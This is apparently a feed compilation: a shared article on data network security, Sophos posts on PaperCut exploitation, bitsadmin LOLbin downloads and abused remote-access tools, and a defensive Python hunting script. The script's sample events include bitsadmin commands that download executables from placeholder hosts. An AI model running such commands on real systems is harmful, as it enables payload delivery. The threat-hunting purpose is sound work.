#Seguridad #Red #Datos #Ciberseguridad #Internet #Conexiones #Network #Redes #RedesDeDatos #SeguridadEnLaRedDeDatos #SeguridadGestionada #Sophos #SophosMDR
-
📌What is data network security?
-
🗓 14/12/2023

📰 In today's digital era, where information flows across vast interconnected networks, data network security has become a fundamental pillar.
-
🔗 Source:👇🏻 👇🏻 https://www.muyseguridad.net/2023/12/14/seguridad-red-datos/

What is data network security?

In today's digital era, where information flows across vast interconnected networks, data network security has become a fundamental pillar. This concept covers a set of measures and practices designed to protect the integrity, confidentiality and availability of the information that travels through computer systems. […]

MuySeguridad. Computer security.

Upon receiving updated threat intelligence, #SophosMDR threat hunters immediately started searching across our customer base for any additional impacted users. The blog post includes SQL queries that Sophos #XDR customers can use (in their Sophos Central console) to identify any suspicious activity.

It's also possible for non-Sophos customers to convert these queries into a #Sigma rule.

One caveat: we observed that a common false positive process activity was the #PaperCut print archive function. But if you identify suspicious activity on a PaperCut server, it's valuable to isolate the machine while you continue to investigate.

We will continue to track these and other threat actors abusing this platform and will update our blog (https://news.sophos.com/en-us/2023/04/27/increased-exploitation-of-papercut-drawing-blood-around-the-internet/) (and the indicators of compromise published on GitHub at https://github.com/sophoslabs/IoCs/blob/master/papercut-nday-indicators-of-compromise.csv) as needed.

6/6

Increased exploitation of PaperCut drawing blood around the Internet

A recent remote code execution (RCE) vulnerability is increasingly in use to deliver Cobalt Strike and other remote management software, along with multiple ransomware threats – what you need to kn…

Sophos News

The #SophosMDR team also discovered cases where threat actors targeting #PaperCut were abusing the bitsadmin.exe Windows application to download payloads. #BITSAdmin is commonly abused by active adversaries as a "living off the land binary" or #LOLbin, handy for accomplishing the task of downloading payloads.

The tools exploited in the attacks have included what we refer to as “dual-use agents,” used both legitimately by IT staff and maliciously by attackers. At the time of writing, Sophos has observed the abuse of #AnyDesk, #Atera, #Synchro, #TightVNC, #NetSupport, and #DWAgent remote management tools across multiple campaigns.

4/6
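
A hunting sketch for the bitsadmin.exe download activity described in the post above, added here as an illustration; it is not one of the Sophos queries and not code from the thread. The event fields (`host`, `image`, `cmdline`), the hosts, paths and URLs are constructed sample data, and the function names are hypothetical.

```python
import re

# bitsadmin.exe switches that create or feed a download job (documented Microsoft switches).
DOWNLOAD_SWITCHES = ("/transfer", "/addfile", "/addfileset", "/addfilewithranges")
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed process-creation events (hypothetical hosts, paths and URLs).
SAMPLE_EVENTS = [
    {"host": "print01", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job1 /download /priority high "
                r"http://198.51.100.7/a.exe C:\Users\Public\a.exe"},
    {"host": "print01", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": "bitsadmin /list /allusers"},
    {"host": "ws-17", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd /c "BITSADMIN.EXE /create j2 & bitsadmin /AddFile j2 '
                r'https://example.test/u.ps1 C:\Temp\u.ps1"'},
    {"host": "ws-20", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad C:\notes\bitsadmin-howto.txt"},
]

def bitsadmin_download(event):
    """Return a finding dict if the event shows bitsadmin fetching a remote file, else None."""
    cmd = event["cmdline"]
    lowered = cmd.lower()
    image = event["image"].lower().rsplit("\\", 1)[-1]
    # Match the binary itself, or a shell wrapper whose command line invokes it with a switch.
    invoked = image == "bitsadmin.exe" or re.search(r"\bbitsadmin(\.exe)?\s+/", lowered)
    if not invoked:
        return None
    # Require both a download-capable switch and a remote URL to cut noise from /list, /info etc.
    switches = [s for s in DOWNLOAD_SWITCHES if re.search(re.escape(s) + r"(\s|$)", lowered)]
    urls = URL_RE.findall(cmd)
    if not switches or not urls:
        return None
    return {"host": event["host"], "switches": switches, "urls": urls}

def hunt(events):
    """Run the check over a list of events and keep only the findings."""
    return [f for f in map(bitsadmin_download, events) if f]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```
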